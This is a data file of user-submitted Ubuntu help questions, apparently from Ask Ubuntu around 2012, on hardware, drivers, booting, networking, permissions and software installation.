227009	ubuntu and external raid enclosure with esata ( no portmultiplier )	first of all , this is my virgin question here so bear with me , i 'm trying to include the infos i think are needed , if something is missing i 'd be happy to provide it if you tell me what it is . on to my problem : i 've got an external enclosure with 2x1tb hard-disks working in raid0 mode formatted with ntfs , the whole thing is supposed to be connected via esata . the problem seems to be that my motherboard does n't support portmultiplying on my esata connector , so ubuntu is seeing it as one big disk but is n't able to mount it due to a read write error . in the error message it is telling me to use dmraid if i 'm using a soft/fakeraid , which i guess i do , but since ubuntu only sees one big disk where there 's actually two , dmraid errors with `` no raid disks '' . i 've got a few different bios options in which mode to run my sata controller sata , raid , ahci . i 'm running in ahci mode , tried the others too but that did n't seem to make a difference . if i switch to my old windows installation on the same computer the enclosure is getting picked up and i can browse my files . so i guess the problem is that ubuntu ca n't cope with my harddisks because of no portmultiplying support ? i could hook it up with usb2.0 but i 'd really like the additional speed of my esata port , is there a way to get this running ? some infos : pc : zbox hd-nd22 chipset : nvidia ion ubuntu : 12.10 i686 kernel : 3.5.0-19-generic parts of syslog : http : //paste.ubuntu.com/1420234/ ntfs-3g and dmraid : http : //paste.ubuntu.com/1420251/ enclosure : stardom sohoraid sr2 stardom.com.tw/sohoraid_sr2_spec.html ( old usb2.0/esata version ) i hope those are the most important bits .
227016	automount external hdd in fluxbox ubuntu -12.10 commandline install	i did the following : install command line interface with ubuntu alternate install 12.10 in vmwareplayer5 ( 9.2.2 ) after the base system was installed : sudo apt-get update , upgrade and dist-upgrade , sudo apt-get install xinit xorg fluxbox build-essential lxterminal gksu leafpad pcmanfm mc chromium-browser , this works . i also installed vmwaretools . the problem is that usb hdd or thumb drives wo n't mount unless i mount them through commandline . i 'm new at building fluxbox so any help regarding automounting would be much appreciated !
227018	dell optiplex 740 amd 64 sound drivers	ok , i have an old optiplex machine that i am using for android stuff and i can not get the sound working on the onboard sound . i can not seem to find the right alsa drivers or set up to do so . i also installed my amd raedeon video card with no problems but it does have hdmi out . could this be causing the issue ? i have disabled the driver to see if that was the case but still no sound
227027	bt yahoo calendar events not showing in thunderbird 17.0 - lightning 1.9	i 'm sure that i have correctly added my bt yahoo calendar , as every time i start thunderbird 17.0 i am asked for user id and password for calendar , which i provide , but none of the events in my bt yahoo calendar show up , it remains completely empty . when asking for user id and password it says something about zimbra server which i do n't understand . any suggestions ?
227029	is having several desktop environments on one account bad ?	i have gnome classic , cinnamon , unity , gnome 3 , and kde installed on my only user account because i enjoy a little change from time to time ( although my favorite is gnome classic ) so i installed all of these desktop environments . i heard from a friend that it could potentially cause some problems . i was also told that it would be okay if i created a separate account for each environment , but i do n't want to if i do n't have to . any help is much appreciated , thank you .
227031	if format my system and install ubuntu as only os what will to happen hard disk drives ?	at this time i am running windows and i want install ubuntu instead of windows . my concern is that if i install ubuntu what will happen to the hard disk drives ( c , d , e etc ) . can you also tell me that how to format the system after booting from a usb stick ? ?
227033	how to make folders like `` system volume information '' or `` recycler '' hidden , just like it is on windows ?	i have this external hard drive , and i used it in windows , now that i use it on ubuntu , and it is kind of annoying to see files like system volume information , so how can i make it hidden ? or how can i make any file hidden ?
227035	how to boot windows 7 after installing ubuntu 12.10 alongside ?	i 'm new to linux and am interested in learning it so i installed ubuntu 12.10 yesterday . installation went smoothly and i chose `` install alongside windows '' option and i set about 50 gb using that slider and i thought i used 50 gb from c : drive but to my shock it used 50 gb space from f : drive . this was my first shock . when i restarted and tried to log into windows , nothing happened except a black screen appeared saying `` to restart press alt+ctrl+delete '' but even pressing that it wont restart . no matter how many times i try rebooting , windows is not booting ; same black screen saying restart appears . but i can log in to ubuntu and i can see that windows c : drive is fine .
227051	i deleted /etc/nginx by mistake . how to fix this ?	i deleted etc/nginx by mistake and now i am stuck . i tried compiling by source and repository but did n't get it back . some please help me asap to fix this problem . a detail explanation will be most appreciated .
227052	desktop background does n't show up on logon screen	i re-installed ubuntu 12.10 and now this feature does not work .
227056	why ubuntu software center , synaptic and terminal are not able to download anything ?	i am using ubuntu 12.04lts . from past few days i am not able to update and downlaod anything . the ubuntu software center crash everytime i open it . synaptic also got the same problem and the terminal show some sort of repository error while downloading and updating ubuntu .
227059	internet sharing over wifi between ubuntu 11.10 and windows7	so i have looked up a lot of forums for these solution but have n't really found one that works . i have a laptop running ubuntu 11.10 connected to the ethernet cord at home and i want to share the internet over wifi with my friend 's laptop running windows7 . i did not think it would be so difficult , i tried a lot of things : i went to networks and then wireless and set up a wifi hotspot , my laptop got connected to it and the ipv4 was set to `` shared to other computers '' . thankfully the network was discoverable and after some tries my friend was able to connect to the network , but it still showed that there was no internet access . i tried coniguring the tcp addresses of the wifi on his laptop . bottom line : did not work . i went to the network manager , clicked on create a new wireless network , created one with security wep 40/128 bit passphrase , tried the other 2 options later , and did the same thing as with the wifi , this network was also not discoverable initially and after some tries , we could connect to it but then ics was not working although there was a working internet on my ubuntu laptop . i would really appreciate if some one who has faced a similar problem and got it fixed to please give me a step by step solution of how to get this work , because this is a prety common problem with ubuntu distros i have noticed . note : this however seems to work with ubuntu to ubuntu connections , but specifically cross os connections like windows or my phone running android ics are not able to see or if connect not able to share internet on my laptop
227061	ubuntu 12.04 on virtualbox	im trying to set up ubuntu one on ubuntu 12.04 in virtualbox and right after step number 3 i get `` sorry , an error has occurred and ubuntu one needs to close '' and under show details it shows `` attributeerror `` nonotype object has no attribute 'stop '' `` . i do not use any type of proxy . im thinking it may not be possible to use ubuntu one under a vm environment just thought i would ask here first . thanks for looking ! .
227064	steam-linux behind a proxy server	i just downloaded steam beta from here . i installed the package , and when i start steam , i get the following it then says , unable to connect . when i start it from the terminal , i get this error . steamupdater : error : download failed : http error 407 since i get a 407 error , it is related to proxy authentication . i have set up my http_proxy , ftp_proxy , https_proxy environment variables . i am behind an authenticated proxy server . how do i get steam working from behind a proxy server ?
227065	is there a way to generate the gnome3 effect when pressing the super key on xfce	i 've switched to xfce from gnome3 . mainly to experiment . i find the super key effect on gnome shell really useful . both the showing all windows and the application finder are convenient . is there a way to achieve this on xfce ? ( xubuntu 12.10 ) . edit : i 'm using gala windows manager .
227066	how to run ubuntu after extracting the zip file to usb pen drive	i want to install ubuntu in my usb pen drive . my current os is windows 7 enterprise . i downloaded ubuntu as zip file ( using torrent ) and i extracted the files to my usb pen drive . now what should i do to run ubuntu ?
227067	how to change ubuntu boot manager on dual boot ?	i am having both ubuntu 12.04 and windows7 in my system . the problem is when it is booting the boot options very ugly and it shows 6 options . but there are only two options only for both of the operating systems . how to change the boot manager like i want better environment for booting ? thanks in advance for your answer .
227069	can not create bootable usb drive from .iso file	i 've tried formatting the flash drive as fat as well as mac os journaled through diskutility but still can not successfully create a bootable drive . i 'm following the directions here exactly : http : //www.ubuntu.com/download/help/create-a-usb-stick-on-mac-osx environment : macbook pro trying to create a bootable flash drive for a macbook pro . 8gb flash drive . tested ubuntu-12.04.1 as well as ubuntu 12.20 .iso 64-bit downloads . nothing to repair in disk utility for this hard drive . every time i finish step 8 of the tutorial i get `` file system not recognized '' with the options to `` initialize '' meaning to reformat my drive , `` ignore '' or `` eject . '' when i try to re-inspect the flash drive in disk utility after plugging it back in i see that it has some error when i try to verify it but the `` repair '' button is disabled . i just want to boot to ubuntu when my mac first starts up . oh the pain . http : //lifehacker.com/5934942/how-to-dual-boot-linux-on-your-mac-and-take-back-your-powerhouse-apple-hardware '' linux is free insomuch as your time is worthless '' - old wise man
227071	sound stopped suddenly	i was watching a movie when all of a sudden the sound stopped working . i can hear the stuff with headphone but not without headphone . its beyond understanding for me as to why should sound stop all of a sudden and work only with a headphone . any help ? ubuntu 12.04 i have tried the obvious things like checking if it is muted and restarting the system over 5 times already . these are the results of the various tests i ran : pacmd list-sinks 1 sink ( s ) available . * index : 0 name : driver : flags : hardware hw_mute_ctrl hw_volume_ctrl decibel_volume latency dynamic_latency state : running suspend cause : priority : 9959 volume : 0 : 24 % 1 : 24 % 0 : -37.19 db 1 : -37.19 db balance 0.00 base volume : 100 % 0.00 db volume steps : 65537 muted : no current latency : 15.60 ms max request : 2 kib max rewind : 64 kib monitor source : 0 sample spec : s16le 2ch 44100hz channel map : front-left , front-right stereo used by : 1 linked by : 1 configured latency : 16.00 ms ; range is 16.00 .. 371.52 ms card : 0 module : 4 properties : alsa.resolution_bits = `` 16 '' device.api = `` alsa '' device.class = `` sound '' alsa.class = `` generic '' alsa.subclass = `` generic-mix '' alsa.name = `` stac92xx analog '' alsa.id = `` stac92xx analog '' alsa.subdevice = `` 0 '' alsa.subdevice_name = `` subdevice # 0 '' alsa.device = `` 0 '' alsa.card = `` 0 '' alsa.card_name = `` hda intel '' alsa.long_card_name = `` hda intel at 0xfbd00000 irq 49 '' alsa.driver_name = `` snd_hda_intel '' device.bus_path = `` pci-0000:00:1b.0 '' sysfs.path = `` /devices/pci0000:00/0000:00:1b.0/sound/card0 '' device.bus = `` pci '' device.vendor.id = `` 8086 '' device.vendor.name = `` intel corporation '' device.product.name = `` 5 series/3400 series chipset high definition audio '' device.form_factor = `` internal '' device.string = `` front:0 '' device.buffering.buffer_size = `` 65536 '' device.buffering.fragment_size = `` 32768 '' device.access_mode = `` mmap+timer '' device.profile.name = `` analog-stereo '' device.profile.description = `` analog stereo '' device.description = `` built-in audio analog stereo '' alsa.mixer_name = `` intel ibexpeak hdmi '' alsa.components = `` hda:111d7605,10280447,00100105 hda:80862804,80860101,00100000 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' ports : analog-output-speaker : speakers ( priority 10000 , available : no ) properties : analog-output-headphones : headphones ( priority 9000 , available : yes ) properties : active port : pulseaudio e : [ pulseaudio ] pid.c : daemon already running . e : [ pulseaudio ] main.c : pa_pid_file_create ( ) failed . i created various accounts and its the same for all users .
227072	how to access a xfs partition on external usb drives ?	how do i obtain access rights in xfs ? my external hd connected to a samsung smarttv keeps on breaking down . i want to add avi and mk4 files to the hard-drive but i have no access via ubuntu . how should i try to get access to a usb drive formatted with xfs ?
227073	upgrading libglu1-mesa to its latest version	yesterday i needed to install freeglut3 , and ubuntu was saying that it needed libglu1-mesa=8.0.4-0ubuntu0.2 while 8.1~git1206081121.640409~gd~p was to be installed . so in order i did apt-get install -- reinstall libglu1-mesa=8.0.4-0ubuntu0.2 and freeglut3 finally got installed . when i started ubuntu today , it got me onto unity 2d . i got from that that what i did yesterday was not wise . now compiz can not start properly i suppose . i do n't know if it is going to work , but if i install the version i had yesterday will it switch automatically ? also , i do not know how to do it , installing the latest version of libglu1-mesa
227074	ca n't remove device from ubuntu one	i have a few devices connected to my ubuntu one account . from https : //one.ubuntu.com/account/ , i removed the device i no longer wanted connected . it seemed to remove successfully . however , as a test , when i deleted some files from the ubuntu one directory from the removed device , i noticed that the file also get removed from the ubuntu one online account and also from all the other connected devices . so my question is . how do i remove a device from ubuntu one ? bug report : https : //bugs.launchpad.net/ubuntu/+source/ubuntuone-control-panel/+bug/1088855
227075	how to lock and encrypt folder and files	i installed cryptkeeper in my laptop and when i click on the icon , it is not opening up or responding . i 'm using ubuntu 12.10 64-bit version . please help me on how to use this software or tell me how to lock/encrypt my files and folders .
227076	i am not able to install wine	i ca n't install wine in ubuntu 12.10 . the report is : los siguientes paquetes tienen dependencias incumplidas : ( the following packages have unmet dependencies ) wine1.4 : predepends : dpkg ( > = 1.15.7.2~ ) pero 1.16.7ubuntu6 no estรก instalado depends : libc6 ( > = 2.14 ) pero 2.15-0ubuntu20 no estรก instalado depends : wine1.4-amd64 ( = 1.4.1-0ubuntu1 ) pero 1.4.1-0ubuntu1 no estรก instalado depends : wine1.4-i386 ( = 1.4.1-0ubuntu1 ) pero no va a ser instalado i would like that you help me in this problem . thanks for everything .
227078	problems with wired ethernet connection ubuntu 11.10	after some partition shuffling , i 've got a problem on my 11.10 system . the wired ethernet interface fails to come up , although the wireless interface is working . i 'm using networkmanager . i thought this may be a problem with networkmanager , so i checked the config files , which look ok . i then tried re-installing the package , but this did n't resolve the issues . i 'm not sure at this point if the problem is due to software configuration , or a hardware problem . i 've also tried the cable in other router ports , but same problem . the symptoms are : - system settings - > network reports that the cable is unplugged ( it is n't ) ifconfig reports the following eth0 link encap : ethernet hwaddr f0:4d : a2 : a2 : a7 : fe up broadcast multicast mtu:1500 metric:1 rx packets:10 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:792 ( 792.0 b ) tx bytes:0 ( 0.0 b ) interrupt:46 base address:0xe000 my /etc/network/interfaces file has the following : auto lo iface lo inet loopback my /etc/resolv.conf file has the following : # generated by networkmanager the router 's red light is on for this port dmesg reports : addrconf ( netdev_up ) : eth0 : link is not ready
227079	cedarview gma3600 and gles	i am a desperate owner of acer aspire one d270 netbook . every bird knows that its graphics is problematic , since there is no solution to move 3d acceleration on linux . i was wondering if that could be possible with opes source drivers that intel released and compiz , which from version 0.9.8 supports opengles rendering instead of opengl . has anyone tried any combination of these two . i want to know that , so that i could try for myself . any hint cocerning this problem would be appreciated !
227082	remmina remote desktop rdp randomly logs off	i am using the remmina remote desktop connection on ubuntu 12.04 to create rdp connection . the system on the remote desktop is windows server 2003 rc standard 64 edition which logs off by itself randomly . it terminates the connection , so you have to re-connect . for example : terminates when i want to switch to another application or simply change the desktop . on another pc ( which is running on windows ) this problem does not occur . does the remmina have timeout or logoff settings which can cause this problem ? what could be the solution ?
227083	problems while upgrading from 11.10 to 12.04	i was upgrading from ubuntu 11.10 to ubuntu 12.04 using the alternate cd method . everything went fine upto installing upgrades , but during the cleanup phase , it asked me to remove obselete packages or not , and to close all open applications . i used alt+tab to view open applications , and then it just hanged , i could only move mouse , entire screen got blank , and i was forced to restart , leaving the upgrade in middle . after restarting my ubuntu 12.04 is working fine , i think ubuntu got upgraded as only cleanup and restarting phases were remaining when i restarted , can there be problems with this ubuntu , or is this fine ?
227084	dell inspiron 531 dt keyboard loses focus	the keyboard on my dell inspiron 531 dt keeps losing focus . it does it when in any program so is not program specific . i have checked i have up to date drivers and done a dell diagnostic check but still it continues . seems to be getting worse and happens more frequently . i find if i press the esc , num lock or caps lock keys it often clears the problem but not always . often i have to close down the program i 'm working in . the mouse continues to operate okay even when the keyboard is n't . is is connected via a usb to the desktop pc . anyone have any ideas on how to solve this annoying problem ? is the keyboard wearing out or is there some other problem . help please ! thanks
227090	ubuntu 12.10 live usb booterror	i am a linux newbee , running ubuntu 12.04 i386 on a 64-bit machine . now i just downloaded ubuntu 12.10 amd64 iso and made a bootable usb using startup disk creator . i was directed to install available updated packages , which i did install . the startup disk was succesfully created . but when i tried to boot from the usb i am getting a booterror message and nothing else . what could have gone wrong ?
227097	ubuntu 12.10 driver for epson xp-202	can anyone advise me if there is a printer driver for an epson xp-202 printer to work with ubuntu 12.10 ? if not , is there a workaround ?
227098	ca n't open software center or update manager	when i try to ( not from terminal ) the following error message opens up : an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : malformed line 60 in source list /etc/apt/sources.list ( dist parse ) ' using ubuntu 12.04 , thanks . edit : went to line 60 , this is what i found : deb http : //archive.canonical.com/precise partner edit : commented the line out , software manager works fine now .
227100	why ubuntu 12.04 can not copy a file from my laptop to a usb disk ?	i just downloaded an ubuntu 12.10 iso to update my operating system . but when i copy this file to the usb ( h : / ) , it does n't work . the copy one in the usb is `` 0kb '' . it make me feel awful , if the size is limited ? when the file is too big ( 700mb and more ) , it may does n't work ? i am a newer , hope you answer . many thanks . ps : you also can give me a email ( mine is : smq806 @ gmail.com ) thank you !
227102	how to get the launcher to stay and hide ? 12.04	i 'm on ubuntu 12.04 . my launcher keeps on hiding when i 'm on the desktop . but i want it to stay out . and when i 'm using programs i want it to hide . is there anyway to do this ?
227104	touchpad is not working in acer aspiron oned260	i am using ubuntu 12.04. touch pad is not detecting in my netbook . sometimes it is detected and work properly . i try to find list of input device using xinput command.it will not shows the touch pad.its look like software bug . can any one help to rectify this issue ?
227108	c++ programming - is there a way to make gedit recognize new classes ?	i 'm c++ programming in ubuntu 12.04 using gedit and it recognizes c++ default commands . i was wondering if i can make it able to recognize the new classes i define and change their color in the code or sth . thank you
227109	can not find xorg.conf in xubuntu 12.10	for some resolution reasone , i need to use custom edid.bin . as i know , it can be configure in xorg.conf , but there is
227111	what information does zeitgeist collect ?	richard matthew stallman has called ubuntu `` spyware '' . does the program called zeitgeist spy ? how can i disable it ? what type of data does zeitgeist send out ?
227116	airplane mode in network settings	the gnome documentation states : switch airplane mode on . this will turn off your wireless connection until you switch off airplane mode again . using airplane mode will completely turn off both wireless and bluetooth connections . i have airplane mode turned on in my network settings , but still am able to access both wireless and bluetooth . so , what is the real purpose of having airplane mode ?
227123	how do i specify a string to display in the ubuntu software-center when creating a package with dpkg-deb ?	when i open *.deb packages downloaded from the internet in the ubuntu software-center , it displays a `` nice '' name for the package ( including upper- and lowercase , spaces , special characters , ... ) . when i create a *.deb package from binaries only using dpkg-deb -b , ubuntu software center displays the `` technical '' package name ( the one specified at the package : field in the control file , limited to lowercase only , no spaces , ... ) . is there any way to provide a string different from the `` technical '' package name ( including upper- and lowercase , spaces , special characters , ... ) for display in the ubuntu software center ? unfortunately , this can not be done via the short description ( that is displayed below the `` technical '' name , but not replacing it ) .
227124	digisol wireless usb dongle is not working in ubuntu 12.10	hi am using lenovo and have installed ubuntu 12.10. the dongle detects the wireles network . when i enter the password ... it connects but after sometime it shows again authentication is required by wireless network.the same password works in windows 7 . please help me . am very much new to ubuntu . : )
227127	ubuntu 12.10 software window thumbnail previews	i want to know if there is an easy way to enable software window thumbnail previews like you get in windows os it would save me a lot of time thank you for your time
227128	how to use a c program to run a command on terminal ?	i want to create a program in c language that would allow me to run a command in the terminal . i have made a program in shell script which would give me the ip of any website that is opened in my browser . this shell script is executed by entering this command in the terminal : sudo tcpdump -n dst port 80 -i eth my professor told me to create a program in c language which would open the terminal and enter this command and then my shell script would work . please tell me how to create such a program .
227130	battery status not shown on asus k53e - ubuntu 12.04 lts	i have asus k53e . my os is ubuntu 12.04.1 lts . when i installed ubuntu , battery status was shown but after a month it stopped working . now i 'm not warned if battery level is low or something happens . laptop just turns off . i know how to fix this , but this is not permanent decision . what i do is : i leave my laptop to work on battery until it turns off by itself . then when i turn on laptop again , battery status is shown how it has to be . but after a day or two status is like before . could anyone help me with a permanent fix ?
227131	ubuntu setup hp 7520 wireless ?	i am setting up a wireless printer hp7520 to . my problem is hp7520 is not working wireless with . he still need the usb connection . i have don the configuration many times..it still not works so i have connected the usb cabel and it works ... .but not wireless.. what im doing wrong
227135	tata photon plus not working in ubuntu 12.04 though configured and was running once upon a time .	i have installed ubuntu 12.04 few months back . my modem , tata photon plus got connected after a number of unsuccessful trials and i browsed the net successfully . but since a month , it is not getting connected . whenever i try to connect , it shows this msg : cdma network you are registered on the home device and modem network-disconnected , you are offline the network signals are completely ok as i am using the same device in windows 7 . i plug in the modem every time i try to connect it . please help me out .
227146	how to group apps in unity launcher	gnome panels used to have trays , where i can add multiple entries so that i can group applications together . how can i achieve such an effect in unity ?
227149	how do i install 12.10 on a pavilion-g6 laptop with uefi	i have a brand new hp pavilion-g6 which boots to pre-loaded windows8 and i want to change the machine to boot up into ubuntu 12.10 whist retaining windows 8 . i am having difficulty booting into ubuntu - i have done the following . downloaded 12.10 ( 64 bit ) from ubuntu site and burnt it to dvd . run the dvd from within windows ( failed to reboot the machine ) installed the boot assistant from the dvd which allows a boot up offering ubuntu 12.10 . rebooted laptop ( both with dvd in and out of the machine ) selected ubuntu option always get the same result - black screen with white text saying c : ubuntu\winboot\wubildr.mbr file not found . i have checked in windows and the file does exist . researched the forums and seen various forums for answers . i noticed recommendations to reconfigure bios to disable secure boot and select 'legacy ' boot up mode . i 'd love to do this but hp have loaded their own 'boot up management software ' as the bios editor with no such options provided ( at least i 've not seen anything that looks 'safe ' to click ) . surely life should not be this hard - and i can not be the only one with problems ? has anyone out there actually achieved an ubuntu 12.10/windows8 boot up on a pavilion g-6 laptop pre-installed with windows8 ? if so , how do you do it please ?
227152	can not detect windows 8 from ubuntu 12.04 live usb installation on toshiba qosmio x870	from other questions raised , i read that if ubuntu live usb boots in uefi mode then it should detect windows 8 during installation . during installation , i only see two options , erase disk and install ubuntu and something else . i do n't want to erase disk and install ubuntu but install ubuntu alongside windows 8 . how can i enable the ubuntu 12.04 live cd/usb to detect the existing windows 8 ? thanks . sorry the latest response . @ rod here are the screenshots as requested : @ paddy here 's the result from running sudo parted -- list : ubuntu @ ubuntu : ~ $ sudo parted -- list model : ata toshiba mq01abd1 ( scsi ) disk /dev/sda : 1000gb sector size ( logical/physical ) : 512b/512b partition table : gpt number start end size file system name flags 1 1049kb 473mb 472mb ntfs basic data partition hidden , diag 2 473mb 746mb 273mb fat32 basic data partition boot 3 746mb 880mb 134mb ntfs basic data partition msftres 4 880mb 990gb 989gb ntfs basic data partition 5 990gb 1000gb 10.4gb ntfs basic data partition hidden , diag model : wd 1600bev external ( scsi ) disk /dev/sdb : 160gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 160gb 160gb primary ntfs model : toshiba toshiba usb drv ( scsi ) disk /dev/sdc : 8011mb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 4129kb 8011mb 8007mb primary fat32 boot , lba thanks !
227155	automatic synchronization of ubuntu one on specific time every day	can i start ubuntu one synchronization from my 12.10 ubuntu desktop on specific time automatically everyday ?
227160	how to get my broadcom 4365 wifi adapter working ?	my previous question about this issue had been closed , and i had been directed to this link . i read through it all day , but none of the solutions over there helped . i still ca n't even switch the wireless adapter on . the only working wireless module is bluetooth . i know for a fact that the wireless adapter is not faulty , because after having asked this question , i installed windows and it worked flawlessly . i just decided to give ubuntu another shot . here 's the story : on my dell inspiron n4050 , i upgraded from the preinstalled 10.10 to 11.04 then 11.10 . then i installed the proprietary driver through additional drivers . since then , the wireless card just stopped working completely , and wo n't even switch on . not even a clean , fresh installation of 12.04 fixed it . so what now ? should i take it in for warranty replacement ? here 's the relevant output of lspci : 09:00.0 network controller : broadcom corporation device 4365 ( rev 01 )
227161	how can we find which process is using a particular port ?	given a port number how can we find which process is using it ?
227162	ubuntu not selectable in boot menu	im trying to dual boot windows 7 and ubuntu 12.10. i created a partition in windows 7 , booted the ubuntu cd , installed ubuntu and created a swap space ( following all instructions detailed in various video tutorials ) . after restarting and taking out the disk my computer boots directly into windows . also , in the boot menu where you select what os to boot , ubuntu does n't show up , just windows 7. i did n't want to screw around with any settings and figured the community could figure out my problem faster than i could : p any help is greatly appreciated !
227164	how can i rotate videos across platforms ?	avidemux was recommended in answer to question 83711 . my question is not quite the same , though it also concerns conversion of video files taken by a `` landscape '' camera which need to be converted to portrait mode i have rotated videos ( usually .mov format ) in windows xp , using apple quicktime pro ( `` qtp '' ) . if done correctly the file remains rotated for other windows machines without the need to retain the original as a reference file , as well as on an imac , but nevertheless , using kubuntu 12.04.1 , appear in the original unrotated form in dragon player ( `` dp '' ) . dp claims to be no more than a `` simple , no frills '' player , so i suspect that the problem is that qtp rotates files in a way that is accessible only by qt . does avidemux do better ? i need an application , if there is one , which will rotate a moving image so that it stays rotated on any computer !
227167	`` multisystem '' lost avareness of installed os	i was using multisystem - http : //liveusb.info/dotclear/ with it i had made usb multiboot with all these in one usb : ubuntu 10.04.04 persistent ubuntu 10.04.04 live ubuntu 12.04 live ubuntu 12.10 live windows xp windows 7 last thing i did using multiboot system was installing boot repair https : //help.ubuntu.com/community/boot-repair sudo add-apt-repository ppa : yannubuntu/boot-repair & & sudo apt-get update sudo apt-get install -y boot-repair it must have nothing to do that i`ve installed boot-repair . btw i didnt run boot-repair so nothing should be changed . but since that on next comp putting multisystem usb didnt find grub anymore so didnt worked multiboot anymore . since then in multisystem it shows empty screen- none of installed os . i did reinstll grub but that gave grub without all installed os . this kind of problem is not 1st time i need to reinstall all usb . is there a way to make multisystem see all already installed systems ? also tried multisystems super grub2 disk and it failed to start.. see pics . shows no os but they are in usb .
227168	how to manually set color of unity panel ?	i was just wondering if there 's a way to set the color of the unity panel manually , as opposed to having it derived from smooshing all the colors of the wallpaper together . ( the launcher on the left side of the screen that comes default in ubuntu is the unity panel , right ? if not , please correct me on my terminology . ) the reason i want this is because i have this cool wallpaper i found on deviantart , and i used gimp to make dawn , dusk , and midnight versions of it . then , i set them with a transition effect , so that the lighting changes over the course of the day . unfortunately , the unity panel turns a sickly sewer green at night ( it could also be said to look like radioactive barf . ) either way , i do n't like my launcher thingy looking like that . i 'd prefer to stay away from programs that let you customise the unity panel ( i 'm fine with using sudo nano to edit system config files , ) but i would if it were the only option . here are some screenshots , one with a grey-themed wallpaper , one with lots of red , and the hill at night , ( the one that makes the unity panel look like radioactive barf . ) : http : //imgur.com/a/0gqcd
227171	bandwidth problem in terminal ?	i 'm trying to install the mac cursors to ubuntu 12.04 but i get this error when using the wget command in terminal . ubuntu @ ubuntu : ~ $ wget -o mac-cursors.zip http : //dl.dropbox.com/u/53319850/noobslab.com/mac-cursors.zip -- 2012-12-09 16:31:17 -- http : //dl.dropbox.com/u/53319850/noobslab.com/mac-cursors.zip resolving dl.dropbox.com ( dl.dropbox.com ) ... 23.21.195.136 , 23.23.139.153 , 107.20.134.231 , ... connecting to dl.dropbox.com ( dl.dropbox.com ) |23.21.195.136|:80 ... connected . http request sent , awaiting response ... 509 bandwidth error 2012-12-09 16:31:18 error 509 : bandwidth error . can someone tell me what this means please , and a possible workaround ? thanks very much .
227181	help recovering broken os ( permissions issue )	( at the bottom there is an important update . ) i was doing experiments in order to backup a remote account to my local system , ubuntu 12.04 lts . i 'm not confident with duplicity and probably , due to wrong syntax , some local files have been replaced with remote files . this is just a supposition , i 'm not sure this is the real cause of os corruption . the corruption happened after experimenting with backups , so i think i did something wrong at this regard . i was aware there was a problem when i tried to access a command using sudo : $ sudo ls sudo : unable to open /etc/sudoers : permission denied sudo : no valid sudoers sources found , quitting sudo : unable to initialize policy plugin this is how /etc/sudoers looks like : $ ls -ald /etc/sudoers -r -- r -- -- - 1 root root 788 oct 2 18:30 /etc/sudoers at this point i tried to reboot and now this is the message i get : the system is running in low graphics mode . your screen , graphics card and input device settings could not be detected correctly . you will need to configure these yourself . i tried to follow the wizard to configure these settings , but without luck ( the system prevents me going on when i press `` next '' ) . the thing that makes me a bit less worried is that all the data on the disk seems readable and i 'm able to access them using a live cd . i run memtest and ram seems to be ok. do you have any idea about how to recover my system ? i 'm very glad to provide further information , just let me know what info could be helpful . update . the issue is about wrong permissions and this is how i discovered : i mounted the root partition of the broken os on /mnt/broken/ ( live cd ) and did ls /mnt/broken/ . i got a permission denied error , while i expected to have the directory listing . i had to do sudo ls /mnt/broken/ and this worked . thus without having root permission via sudo it 's impossible to access the root of broken os . the current output of ls -ld /mnt/broken/ is : drwxr-x -- - 29 1000 812 4096 2012-12-08 21:58 /mnt/broken any thoughts on how to restore the old ( working ) set of permissions ?
227184	how to recover folders from home folder	i was browsing net today..i had to upload a photo but i was unable to find the picture folder..then i opened nautilus.i found out that the 2 folders pictures and videos are mysteriously gone..i totally have no idea.there was remastersys running in background.how can i recover those 2 folders ? and any idea how they got deleted ?
227187	mouse disables on key press , but touchpad does n't	my mouse cursor disables for 1-2 seconds when the keyboard is used . this can make gaming especially difficult . the touchpad is fine ; i can use it at the same time as the keyboard . doing some forum searching , i can see that going to mouse and touchpad > touchpad > disable touchpad when typing works for the touchpad , but i still have the problem when using the mouse . i 've tried using synaptiks , and setting the 'automatically switch off touchpad on keyboard activity ' time to 0 seconds does n't seem to work either . i 'd appreciate any help .
227196	how do i export shotwell photos ordered by date/time they were shot ?	i make an album with pictures from several friends ' cameras . let 's imagine that the exif exposure date and time are correct in all files . filenames , however , are not aligned ( e.g . my camera starts at img0001 but my friend 's phone camera starts at pic1234.jpg , and my own phone starts at pic5678.jpg ) . is there a way with shotwell to export the files from everyone over to a plain directory , with the filenames rewritten so that the pictures are sorted in chronological order ? then , when i slideshow these files in another computer , with another image viewer ( or with shotwell itself in file browsing mode ) , they will show in the right chronological order . example . if i have these six files ... my camera : img_0001.jpg - exif exposure date 2012/12/25 12:05:00 my camera : img_0002.jpg - exif exposure date 2012/12/25 12:11:00 my own phone : pic5678.jpg - exif exposure date 2012/12/25 12:09:00 my own phone : pic5679.jpg - exif exposure date 2012/12/25 12:15:00 friend 's phone : pic1234.jpg - exif exposure date 2012/12/25 12:08:00 friend 's phone : pic1235.jpg - exif exposure date 2012/12/25 12:18:00 ... then i would like to export them with filenames like these : 20121225_120500-img_0001.jpg 20121225_120800-pic1234.jpg 20121225_120900-pic5678.jpg 20121225_121100-img_0002.jpg 20121225_121500-pic5679.jpg 20121225_121800-pic1235.jpg so that they show in the right order when browsing with any image browser . the following script does the trick , but is not integrated in shotwell , which is the point of the question , and will ( gracefully ) fail if the pictures are not exported with exif data : # ! /usr/bin/python import pyexiv2 import sys import shutil def gettimestamp ( f ) : metadata = pyexiv2.imagemetadata ( f ) metadata.read ( ) try : d = metadata [ 'exif.image.datetime ' ] return d.value.strftime ( ' % y % m % d % h % m % s ' ) except exception as e : return `` 00000000000000 '' if len ( sys.argv ) > 1 : for f in sys.argv [ 1 : ] : try : timestamp = gettimestamp ( f ) prefix = `` % s_ '' % timestamp if f [ 0 : len ( prefix ) ] == prefix : print `` file % s was already renamed , not renaming again '' % ( f ) else : nn = `` % s % s '' % ( prefix , f ) shutil.move ( f , nn ) print `` file % s renamed to % s '' % ( f , nn ) except exception as e : print `` file % s not renamed ( % s ) '' % ( f , e ) else : print `` usage : % s < jpg files with exif tags > '' % ( sys.argv [ 0 ] )
